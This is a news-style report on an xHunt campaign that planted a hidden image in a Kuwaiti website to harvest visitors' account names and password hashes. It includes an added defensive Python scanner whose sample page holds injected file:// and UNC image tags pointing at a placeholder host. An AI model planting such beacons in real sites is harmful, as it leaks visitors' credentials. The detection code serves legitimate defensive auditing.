Security researchers from Unit 42, the threat intelligence team of Palo Alto Networks, recently discovered that a Kuwait organization's webpage had been used in a credential-harvesting attack. According to the researchers, the webpage contained a hidden image, and the injection was observed between June and December 2019.
The attackers compromised the website and injected malicious HTML code into it in order to collect credentials, specifically account names and password hashes, from the site's visitors. The researchers believe the attackers intended either to crack these hashes to recover the visitors' passwords or to use the hashes directly in relay attacks. With valid account credentials in hand, the attackers could then deploy remote access trojans (RATs) inside the victim organization.
The researchers stated, “If successful in harvesting account credentials, the compromised data has a plethora of uses for the attackers and can allow them to breach an organization to steal sensitive information. Furthermore, because they’d be using trusted credentials, it can allow attackers to go undetected for long periods of time, enabling them to infiltrate other parts of an organization and even implement backdoors, like RATs, to get back into a system even after being removed. This can result in significant damage to an organization over a prolonged period of time.”
Unit 42 believes that the threat actor group "xHunt" is likely behind the malicious activity. Previously, the xHunt hacking group targeted transportation and shipping organizations based in Kuwait between May and June 2019; in those intrusions the attackers installed a backdoor tool named "Hisoka", and several custom tools were later downloaded to the compromised systems to carry out post-exploitation activities.
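The injection described above, a hidden image whose source causes the visitor's browser to authenticate to an attacker-controlled file share and thereby leak the account name and password hash (an assumed mechanism, consistent with the report's mention of hashes and relay attacks), can be caught by auditing a site's own HTML. The following scanner is an added example, not Unit 42's code or tooling; the sample page and the 203.0.113.5 address are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one legitimate logo, then two injected <img> tags
# that point at a file share on an external host (203.0.113.5 is a TEST-NET
# placeholder) and are hidden either by CSS or by being sized as a 1x1 pixel.
SAMPLE_HTML = r"""
<html><body>
<img src="/static/logo.png" width="200" height="50">
<p>Welcome</p>
<img src="file://203.0.113.5/share/pixel.png" style="display:none">
<img src="\\203.0.113.5\share\x.gif" width="1" height="1">
</body></html>
"""

# A file: URL or a UNC path (\\host\share) as an image source is never needed
# on a public website; when Windows clients resolve it they may send an
# authentication attempt (including a password hash) to that host.
FILE_OR_UNC = re.compile(r"^(file:|\\\\)", re.IGNORECASE)


class ImgAuditor(HTMLParser):
    """Collect <img> tags that look like injected credential-leak beacons."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = (a.get("src") or "").strip()
        reasons = []
        if FILE_OR_UNC.match(src):
            reasons.append("src is a file/UNC resource (forces SMB authentication)")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
            reasons.append("tracking-pixel size")
        if reasons:
            self.findings.append((src, reasons))


def audit_html(html):
    """Return [(src, reasons)] for every suspicious <img> in the document."""
    parser = ImgAuditor()
    parser.feed(html)
    return parser.findings
```

Run `audit_html` over each page of a site from a web-server integrity check; an image that is both hidden and file/UNC-sourced deserves immediate investigation, and a web proxy or host firewall that blocks outbound SMB (TCP 445) from workstations removes the leak path regardless of what the page contains.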
xHunt’s Hacking History
Earlier, in a research report, IBM revealed that the "ZeroCleare" malware was the joint creation of two hacking groups, xHunt and APT34. IBM said the malware was developed by Iranian state-sponsored hackers and used in cyberattacks against energy companies in the Middle East. It added that the hackers launched brute-force attacks to gain access to weakly secured network systems; once a target device was infected, the attackers spread the malware across the company's network as the final stage of the infection.